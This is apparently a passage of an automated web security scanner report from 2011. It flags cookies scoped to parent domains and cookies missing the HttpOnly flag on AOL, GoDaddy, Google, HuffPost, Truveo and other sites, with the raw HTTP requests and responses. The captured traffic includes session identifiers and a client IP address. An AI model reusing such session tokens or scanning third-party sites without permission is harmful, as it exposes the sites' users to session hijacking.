Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


10.114. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 05 May 2011 10:57:55 GMT
Expires: Thu, 05 May 2011 10:57:55 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

10.115. http://www.huffingtonpost.com/users/logout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/logout/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82719
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

10.116. http://www.marketwatch.com/News/Story/Story.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...

10.117. http://www.moviefone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...

10.118. http://www.truveo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=univ_ent; showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 83513

<!DOCTYPE HTML>
<html class="no-js">
<head>
<title>Truveo Video Search</title>
<script type="text/javascript">
<!--
SpriteImg = new Image();
SpriteImg.src = "http://www.truveo.com/client/versions/uni
...[SNIP]...

10.119. http://www.truveo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truveo.com
Path:   /search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
  • unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
  • queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 00:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: showAdult=0; expires=Sat, 04-Jun-2011 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
Set-Cookie: PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.truveo.com/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 105095

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link title="Truveo Video Search" type="application/opensearchdescription+xml" rel
...[SNIP]...

11. Cookie without HttpOnly flag set  previous  next
There are 98 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://www.aol.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
  • tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-43.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=22E4AF9938869340AC16AB3164A9DDA5; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 04-May-2013 00:56:21 GMT; Path=/
Content-Length: 63392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

11.2. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-45.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 1138
Set-Cookie: JSESSIONID=9A77464B1FAA0302D872FC1C71220557; Path=/aol
Content-Length: 1138

<div id="local-module" class="mnid-local plid-60329">
<div id="localheader">

<h2><a href="http://www.aolnews.com/" class="lnid-sec1_lnk1"
name="om_local_title" target='_blank' >Local News
...[SNIP]...

11.3. http://www.crunchboard.com/opening/detailjob.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.crunchboard.com
Path:   /opening/detailjob.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
  • job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opening/detailjob.php HTTP/1.1
Host: www.crunchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 11:10:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=tl21nf3gofq7b0pefe94crkb15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: job1=0-1304593833; expires=Sun, 08-May-2011 07:00:00 GMT; path=/
Location: ./index.php
Vary: Accept-Encoding,User-Agent
Content-Length: 6901
Connection: close
Content-Type: text/html; charset=UTF-8

<script language="javascript" type="text/javascript">
   
   function hidestatus(URL)
   {
   /*var local= /http:|crunchboard.com/;
   var match = URL.search( local );
   if( match == -1 )
   {
   URL='http://tcbiz.p
...[SNIP]...

11.4. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.fightmagazine.com
Path:   /mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

11.6. https://www.godaddy.com/gdshop/catalog.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/catalog.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/catalog.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:20 GMT
Location: /catalog.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQETSARRC=BJIOEHOAIADKADEGPIHAAKME; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:20 GMT
Connection: close


11.7. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
  • traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

11.8. https://www.godaddy.com/gdshop/registrar/search.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
